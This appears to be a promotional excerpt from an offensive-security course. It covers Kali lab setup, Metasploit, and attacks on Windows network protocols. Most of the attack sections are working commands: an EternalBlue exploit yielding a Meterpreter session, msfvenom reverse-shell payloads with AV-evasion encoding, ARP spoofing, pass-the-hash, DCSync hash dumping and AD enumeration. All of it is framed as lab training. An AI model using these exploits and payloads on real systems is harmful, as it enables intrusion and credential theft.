Network Security Red Team Explained Simply (with Diagrams and Real Code)
Network Security Red Team: The Essentials in One Article — Real Code, Diagrams, and Concrete Steps, Excerpts from a 39-Lesson Course.
A guide that gets straight to the point: Network Security Red Team dissected with diagrams, concrete examples and tested commands. Everything comes from a structured 11-chapter course — here is the best of it.
tl;dr
- Prepare your Red Team lab
- Network security fundamentals
- Network reconnaissance and enumeration
- Exploitation and initial access
- Lateral movement and pivoting
~$ cat ./parcours.md # Network Security Red Team — 10 chapters
01
Prepare your Red Team laboratory
→ Course presentation and Red Team ethics→ Install Kali Linux and virtual lab infrastructure+ 1 more lessons
02
Network security fundamentals
→ OSI and TCP/IP model from a pentester's perspective→ Critical protocols for the Red Team+ 1 more lessons
03
Network reconnaissance and enumeration
→ OSINT and passive reconnaissance→ Advanced Nmap scanning (NSE, timing, evasion)+ 2 more lessons
04
Exploitation and initial access
→ Metasploit Framework — network exploit modules→ Metasploit Framework — network exploit modules+ 2 more lessons
05
Lateral movement and pivoting
→ Network pivoting — SSH, Chisel, Ligolo-ng→ Pass-the-Hash, Pass-the-Ticket and Over-Pass-the-Hash+ 2 more lessons
06
Privilege escalation
→ Windows privilege escalation — UAC bypass, token impersonation, services→ Linux PrivEsc — SUID, sudo, capabilities, kernel+ 1 more lessons
07
Persistence and network backdoors
→ Windows persistence — services, registry, tasks, WMI→ Linux persistence — SSH keys, cron, systemd, eBPF+ 1 more lessons
08
Command and Control C2
→ C2 Architecture — Sliver, Havoc and modern frameworks→ Beaconing, sleep, jitter and malleable profiles+ 2 more lessons
🏁
Final project (+ 2 chapters along the way)
→ You leave with a concrete and demonstrable project
Install Kali Linux and the virtual lab infrastructure
NOTE🎯 Learning objectives
At the end of this lesson you will have: installed a hypervisor (VirtualBox or VMware), deployed Kali Linux in a properly isolated VM, configured a host-only network for the lab, and verified that the basic Red Team tools are working.
At the end of this lesson you will have: installed a hypervisor (VirtualBox or VMware), deployed Kali Linux in a properly isolated VM, configured a host-only network for the lab, and verified that the basic Red Team tools are working.
1. Hardware prerequisites
💾 Minimum viable
⚡ Comfortable
🏆 Ideal
WARNING⚠️ Check virtualization
On Windows:
On Windows:
systeminfo | findstr /i "Hyper-V" must show “Yes” for Virtualization Enabled in Firmware. Otherwise enable VT-x/AMD-V in the BIOS/UEFI.2. Choosing your hypervisor
| Hypervisor | Price | Host OS | Advantages | Disadvantages |
|---|---|---|---|---|
| VirtualBox 7.x | Free (GPL) | Win, macOS, Linux | Open-source, unlimited snapshots, GOAD-compatible | Average performance on Windows 11 |
| VMware Workstation Pro | Free (since 2024) | Win, Linux | Very fast, performant NAT | More complex to script |
| VMware Fusion Pro | Free (macOS) | macOS (Intel + Apple Silicon) | Native ARM64 support (M1/M2/M3) | Limitations on Apple Silicon (no Win x86) |
| Hyper-V | Included with Win Pro | Windows 10/11 Pro | Native performance | Limited snapshots, conflict with VBox |
| Proxmox VE | Free | Bare metal | Production-grade, web console | Requires a dedicated server |
TIP💡 Course recommendation
VirtualBox for simplicity and portability (Mac/Win/Linux), or VMware Workstation Pro for performance. GOAD supports both natively via Ansible.
VirtualBox for simplicity and portability (Mac/Win/Linux), or VMware Workstation Pro for performance. GOAD supports both natively via Ansible.
3. Installing VirtualBox
On Windows
# Download from https://www.virtualbox.org/wiki/Downloads # Version 7.0.x (stable) or 7.1.x # Silent install via winget winget install -e --id Oracle.VirtualBox # Verify the installation VBoxManage --version # Should display: 7.0.x or 7.1.x # Install the Extension Pack (USB 3.0, RDP, disk encryption) # Download Oracle_VM_VirtualBox_Extension_Pack-7.x.vbox-extpack VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-*.vbox-extpack
On macOS (Intel)
# Via Homebrew brew install --cask virtualbox brew install --cask virtualbox-extension-pack # Approve the kext in System Preferences > Security # (requires reboot)
On Linux (Ubuntu / Debian)
# Add the Oracle repository
wget -O- https://www.virtualbox.org/download/oracle_vbox_2016.asc | \
sudo gpg --dearmor -o /usr/share/keyrings/oracle-virtualbox-2016.gpg
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/oracle-virtualbox-2016.gpg] \
https://download.virtualbox.org/virtualbox/debian $(lsb_release -cs) contrib" | \
sudo tee /etc/apt/sources.list.d/virtualbox.list
sudo apt update
sudo apt install -y virtualbox-7.0
# Verify
VBoxManage --version4. Download Kali Linux
Kali Linux is the Debian-based distribution dedicated to offensive security. It includes more than 600 tools out of the box.
# Official page: https://www.kali.org/get-kali/ # Option 1: Pre-built VirtualBox VM (RECOMMENDED) # File : kali-linux-2026.X-virtualbox-amd64.7z # Size : ~3 GB # Benefit: VBox Guest Additions already installed # Option 2: ISO installer # File : kali-linux-2026.X-installer-amd64.iso # Size : ~4 GB # Benefit: full control over the install # Option 3: WSL (Windows Subsystem for Linux) # Benefit: Windows integration, lightweight # Drawback: no easy persistent Metasploit DB # Integrity check (ALWAYS!) sha256sum kali-linux-2026.*-virtualbox-amd64.7z # Compare with the value published on kali.org
WARNING⚠️ Always verify the SHA256
Malicious mirrors have already distributed trojanized Kali images. Always verify the SHA256 hash against the one published on the official site.
Malicious mirrors have already distributed trojanized Kali images. Always verify the SHA256 hash against the one published on the official site.
5. Import the pre-built Kali VM
# 1. Extract the archive
7z x kali-linux-2026.X-virtualbox-amd64.7z
# 7zip crashes? Install: sudo apt install p7zip-full
# 2. Import into VirtualBox (option A: GUI)
# File > Import Appliance > select the .vbox
# 3. Import via CLI (option B: script)
VBoxManage import kali-linux-2026.X-virtualbox-amd64/kali-linux-2026.X-virtualbox-amd64.vbox \
--vsys 0 --vmname "Kali-Red-Team" --cpus 4 --memory 6144
# 4. List VMs
VBoxManage list vms
# Should display: "Kali-Red-Team" {uuid}Recommended settings before first boot
VM="Kali-Red-Team" # Allocate 4 CPUs and 6 GB RAM VBoxManage modifyvm "$VM" --cpus 4 --memory 6144 # Enable bidirectional shared clipboard VBoxManage modifyvm "$VM" --clipboard-mode bidirectional --draganddrop bidirectional # Enable video acceleration VBoxManage modifyvm "$VM" --vram 128 --graphicscontroller vmsvga --accelerate3d on # Disable USB 1.0, enable USB 3.0 VBoxManage modifyvm "$VM" --usb on --usbehci on --usbxhci on # Generate a fixed MAC address (useful for network snapshots) VBoxManage modifyvm "$VM" --macaddress1 080027AA1010
Metasploit Framework — network exploit modules
NOTE🎯 Learning objectives
At the end of this lesson you will know how to navigate Metasploit Framework (msfconsole), select the right network exploit modules, choose a suitable payload, start a handler, and obtain a Meterpreter session on a vulnerable lab target.
At the end of this lesson you will know how to navigate Metasploit Framework (msfconsole), select the right network exploit modules, choose a suitable payload, start a handler, and obtain a Meterpreter session on a vulnerable lab target.
1. Why Metasploit?
Metasploit Framework (MSF) is the exploitation framework most widely used in the world. It brings together more than 2 300 exploits, 1 500 payloads, 700 auxiliary modules and 600 post-exploitation modules.
✅ Strengths of Metasploit
⚠️ Limitations to know
TIP💡 When to use MSF?
Excellent for: educational pentesting, classic network CVEs (SMB, RPC, web RCE), basic pivoting. Less suitable for: modern stealthy Red Team ops (prefer Sliver, Mythic, Havoc).
Excellent for: educational pentesting, classic network CVEs (SMB, RPC, web RCE), basic pivoting. Less suitable for: modern stealthy Red Team ops (prefer Sliver, Mythic, Havoc).
2. Metasploit structure
/usr/share/metasploit-framework/ ├── modules/ │ ├── exploits/ # 2300+ exploits by OS / service │ ├── payloads/ # 1500+ payloads │ ├── auxiliary/ # Scanners, brute force, sniffers │ ├── post/ # Post-exploitation modules │ ├── encoders/ # Payload obfuscation (poor AV effectiveness) │ ├── nops/ # NOP sleds │ └── evasion/ # Anti-AV modules └── data/ # Wordlists, templates
Module categories
| Type | Description | Example |
|---|---|---|
| exploit | Code that exploits a vulnerability | exploit/windows/smb/ms17_010_eternalblue |
| auxiliary | Scanners, fuzzers, brute force, DoS | auxiliary/scanner/smb/smb_login |
| payload | Code sent after the exploit (shell, meterpreter) | windows/x64/meterpreter/reverse_https |
| post | Actions after a session is opened | post/windows/gather/hashdump |
| encoder | Payload obfuscation | x86/shikata_ga_nai |
| evasion | Bypass AV/Defender | windows/windows_defender_exe |
3. First steps in msfconsole
# 1. Start the PostgreSQL database (at boot) sudo systemctl start postgresql sudo msfdb init # once only # 2. Launch msfconsole with database enabled msfconsole -q msf6 > db_status # [*] Connected to msf. Connection type: postgresql. # 3. Create a workspace per mission (CRUCIAL) msf6 > workspace -a mission_lab msf6 > workspace # * mission_lab <- the star = active workspace # 4. Import an Nmap scan msf6 > db_import /tmp/enriched.xml msf6 > hosts msf6 > services -p 445 # 5. Search for a module msf6 > search type:exploit eternalblue msf6 > search name:bluekeep platform:windows msf6 > search cve:2017-0144 # 6. Full help msf6 > help msf6 > info exploit/windows/smb/ms17_010_eternalblue
4. Anatomy of a Metasploit exploit
# Standard sequence to RUN AN EXPLOIT msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(...) > show options msf6 exploit(...) > show targets msf6 exploit(...) > show payloads # Configure the REQUIRED options (Required: yes) msf6 exploit(...) > set RHOSTS 192.168.56.20 msf6 exploit(...) > set RPORT 445 # Choose a suitable payload msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_https msf6 exploit(...) > set LHOST 192.168.56.10 # your Kali msf6 exploit(...) > set LPORT 8443 # Verify the options msf6 exploit(...) > show options # (Optional) verify that the target is vulnerable msf6 exploit(...) > check # [+] 192.168.56.20:445 - The target is vulnerable. # Launch! msf6 exploit(...) > run # [*] Started HTTPS reverse handler on https://192.168.56.10:8443 # [*] Sending stage (203846 bytes) to 192.168.56.20 # [*] Meterpreter session 1 opened ... meterpreter >
5. Choosing the right payload
Naming conventions
windows/x64/meterpreter/reverse_https ^^^^^^^^^^^ ^^^^^^^^^^^^ ^^^^^^^^^^^^^ | OS+arch | Type | Transport windows : Windows x64 : 64-bit architecture meterpreter : advanced payload (vs simple «shell») reverse_https : encrypted outbound connection to the attacker
Main transports
| Transport | Direction | Stealth | When to use |
|---|---|---|---|
reverse_tcp | Target → Attacker (custom port) | Low (suspicious traffic) | Lab, open outbound port |
reverse_https | Target → Attacker (encrypted 443) | Good (legitimate TLS) | Standard corporate network |
reverse_http | Target → Attacker (80) | Medium (clear-text HTTP) | If HTTPS is blocked |
bind_tcp | Attacker → Target (custom port) | Low (target listens) | Reverse NAT, direct target exposure |
reverse_dns | Tunnel via DNS | Very good (rare) | Highly segmented network |
reverse_winhttps | HTTPS via WinHTTP (cert pinning) | Excellent | Bypass enterprise proxy |
TIP💡 Rule of thumb
In the lab:
On an internal engagement:
If there is a corporate proxy:
In the lab:
reverse_tcp on 4444 (fast).On an internal engagement:
reverse_https on 443 (passes firewalls/proxies).If there is a corporate proxy:
reverse_winhttps which respects system settings.6. Multi/handler — receive sessions independently
The multi/handler module is a “generic receiver” that listens for payloads generated separately (with msfvenom).
msf6 > use multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set LHOST 192.168.56.10 msf6 exploit(multi/handler) > set LPORT 443 msf6 exploit(multi/handler) > set ExitOnSession false msf6 exploit(multi/handler) > run -j # -j = background job # View active jobs msf6 > jobs # Stop a job msf6 > jobs -k 1
Generate a payload with msfvenom
# Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f exe -o /tmp/payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-f elf -o /tmp/payload
# PowerShell one-liner
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f psh-cmd
# DLL injection
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-f dll -o /tmp/payload.dll
# Raw shellcode (for a custom loader)
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f raw -o /tmp/shellcode.bin
# Encoded (Shikata Ga Nai for simple AV bypass)
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-e x64/xor_dynamic -i 10 \
-f exe -o /tmp/encoded.exeCritical protocols for Red Team
NOTE🎯 Learning objectives
At the end of this lesson you will know how the 7 fundamental protocols of a Windows enterprise network work and what exploitable weaknesses they have: ARP, DNS, SMB, LDAP, Kerberos, RDP and WinRM. You will be able to identify them in Wireshark and recognize which attacks each one enables.
At the end of this lesson you will know how the 7 fundamental protocols of a Windows enterprise network work and what exploitable weaknesses they have: ARP, DNS, SMB, LDAP, Kerberos, RDP and WinRM. You will be able to identify them in Wireshark and recognize which attacks each one enables.
1. ARP — the first weak link
ARP (Address Resolution Protocol) translates IP to MAC on a LAN. Without authentication it is the number-one target on an internal network.
# View the local ARP cache ip neigh show # or arp -an # Poison a target’s cache (lab only) bettercap -iface eth1 > set arp.spoof.targets 192.168.56.20 > set arp.spoof.fullduplex true > arp.spoof on > net.sniff on # View intercepted traffic in Wireshark sudo wireshark -i eth1
Exploitable ARP weaknesses
TIP💡 Mitigation
DAI (Dynamic ARP Inspection) on Cisco/HP switches, 802.1X, static ARP for the critical gateway, or simply end-to-end encryption (TLS, VPN) that renders interception harmless.
DAI (Dynamic ARP Inspection) on Cisco/HP switches, 802.1X, static ARP for the critical gateway, or simply end-to-end encryption (TLS, VPN) that renders interception harmless.
2. DNS — the chatty directory
DNS is used not only for name resolution; it also reveals the Active Directory topology via SRV records.
# Find the DC of a domain via DNS
dig _ldap._tcp.dc._msdcs.lab.local SRV
dig _kerberos._tcp.lab.local SRV
dig _gc._tcp.lab.local SRV # Global Catalog
# Find all machines in a domain (Zone Transfer if allowed)
dig @192.168.56.10 lab.local AXFR
# Reverse DNS on a /24
for ip in 192.168.56.{1..254}; do
host $ip 2>/dev/null | grep -v NXDOMAIN
done
# Dynamic DNS: register a fake name (lab only if allowed)
nsupdate -k /tmp/key.conf <<EOF
server 192.168.56.10
update add evil.lab.local 60 A 192.168.56.99
send
EOFRed Team DNS attacks
| Attack | Description | Tools |
|---|---|---|
| Zone transfer (AXFR) | If allowed, full zone dump | dig, dnsenum |
| DNS cache poisoning | Poison a resolver’s cache | dnspoof, mitm6 |
| DNS subdomain enum | Discover subdomains (external recon) | amass, subfinder, sublist3r |
| DNS tunneling C2 | Exfiltrate/control via DNS queries | iodine, dnscat2 |
| NS records hijack | Take control of an abandoned NS | nsec3walker |
3. SMB — the Red Team Swiss Army knife
SMB (Server Message Block) = file sharing, printer sharing, remote execution, RPC transport. It is THE Windows attack protocol.
# Enumeration: version, OS, shares, users crackmapexec smb 192.168.56.0/24 crackmapexec smb 192.168.56.10 -u jon.snow -p 'Winter2026!' --shares crackmapexec smb 192.168.56.10 -u '' -p '' --users # Null session # List shares with smbclient smbclient -L //192.168.56.10/ -U jon.snow%'Winter2026!' # Connect to a share smbclient //192.168.56.10/Public -U jon.snow%'Winter2026!' smb: \> ls smb: \> get secret_file.txt # Mount the share sudo mount -t cifs //192.168.56.10/Public /mnt/smb \ -o username=jon.snow,password='Winter2026!',vers=3.0
Iconic SMB attacks
🏭 Pre-auth (no creds)
🔐 Post-auth (with creds)
# Test a host for EternalBlue
nmap --script smb-vuln-ms17-010 -p 445 192.168.56.0/24
# Metasploit exploitation (lab only)
msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.56.20
msf6 > run
# Lateral movement PSExec with NT hash (Pass-the-Hash)
impacket-psexec -hashes :32ED87BDB5FDC5E9CBA88547376818D4 \
administrator@192.168.56.10
# Dump hashes (DCSync, requires DA rights)
impacket-secretsdump lab.local/administrator:'Pass!'@192.168.56.10 -just-dc4. LDAP — the transparent directory
LDAP (port 389/636) exposes everything in AD: users, groups, GPOs, OUs, ACLs. A simple domain authentication is usually enough to query it.
# Search for users ldapsearch -x -H ldap://192.168.56.10 \ -D "jon.snow@lab.local" -w 'Winter2026!' \ -b "DC=lab,DC=local" -s sub "(&(objectClass=user)(objectCategory=person))" \ sAMAccountName description # Search for Kerberoastable accounts (with SPN) ldapsearch -x -H ldap://192.168.56.10 \ -D "jon.snow@lab.local" -w 'Winter2026!' \ -b "DC=lab,DC=local" "(&(samAccountType=805306368)(servicePrincipalName=*))" \ sAMAccountName servicePrincipalName # Search for AS-REP roastable accounts ldapsearch -x -H ldap://192.168.56.10 \ -D "jon.snow@lab.local" -w 'Winter2026!' \ -b "DC=lab,DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" # Search the schema (all classes) ldapsearch -x -H ldap://192.168.56.10 -b "CN=Schema,CN=Configuration,DC=lab,DC=local" cn
BloodHound: LDAP as a graph
# Full collection from Kali
bloodhound-python -u jon.snow -p 'Winter2026!' -d lab.local \
-ns 192.168.56.10 -c All --zip
# Start Neo4j and BloodHound GUI
sudo neo4j start
bloodhound
# Drag & drop the .zip into the interface
# Query: Shortest path to Domain Admins
# Query: Find Kerberoastable Usersgo-further
This article covers the most useful excerpts — the complete Network Security Red Team course (11 chapters, 39 lessons, corrected exercises and final project) takes you all the way.
./access-the-full-course free course: Mastering Claude CodeFAQ
How long does it take to learn Network Security Red Team?
With a structured progression (11 chapters, 39 short practical lessons) you reach an operational level in a few weeks at 30–60 minutes per day. The key is to practice each concept immediately.
Are there any prerequisites?
It is best to be comfortable with the fundamentals of the domain: this content goes in depth with real-world cases.
Where to start concretely?
Reproduce the commands in this article, then follow the complete Network Security Red Team course: it chains the 39 lessons in order, with exercises and a final project.
./also-read
→ Get started with Ethical Hacking Fundamentals: your first concrete step today→ Advanced Penetration Testing in practice: the code and commands that really matter→ Web Application Security: the 9 key steps to go from zero to operational📬 Want to receive this kind of guide every week? Subscribe for free — real code, zero fluff.